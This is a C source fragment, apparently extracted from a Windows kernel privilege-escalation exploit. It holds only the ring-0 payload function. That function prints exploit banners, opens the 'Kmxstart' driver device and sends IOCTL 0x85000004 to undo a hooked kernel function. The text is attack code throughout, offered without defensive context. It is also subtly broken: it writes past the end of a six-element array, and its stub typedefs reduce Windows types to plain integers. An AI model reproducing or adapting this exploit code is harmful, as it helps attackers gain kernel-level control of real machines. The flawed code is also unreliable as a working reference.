
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int VOID ;
typedef int LPVOID ;
typedef int HANDLE ;
typedef scalar_t__ DWORD ;


 int CreateFile (char*,int ,int ,int *,int,int ,int ) ;
 int DeviceIoControl (int ,int,int ,int,int ,int,scalar_t__*,int *) ;
 int exit (int) ;
 int printf (char*) ;

VOID Ring0Function()
{
 DWORD CallBacks[6];
 DWORD junk;
 HANDLE hDevice;

 printf("\n");
 printf("-----[RING0]------");
 printf("\n");
 printf("[*] Message: [.oO Hello From Ring0! Oo.]\n");
 printf("[!] Cleaning up Hooked Function\n");

 CallBacks[0]=0;
 CallBacks[1]=0;
 CallBacks[2]=0;
 CallBacks[3]=0;
 CallBacks[4]=0;
 CallBacks[5]=0;
 CallBacks[6]=0;

 hDevice = CreateFile("\\\\.\\Kmxstart",
                     0,
                     0,
                     ((void*)0),
                     3,
                     0,
                     0);

 DeviceIoControl(hDevice,
                 0x85000004,
                 (LPVOID)CallBacks,0x18,
                 (LPVOID)CallBacks,0x44,
                 &junk,
                 ((void*)0));

 printf("[!] Exploit Terminated\n");
 printf("-----[RING0]------");
 exit(1);
}
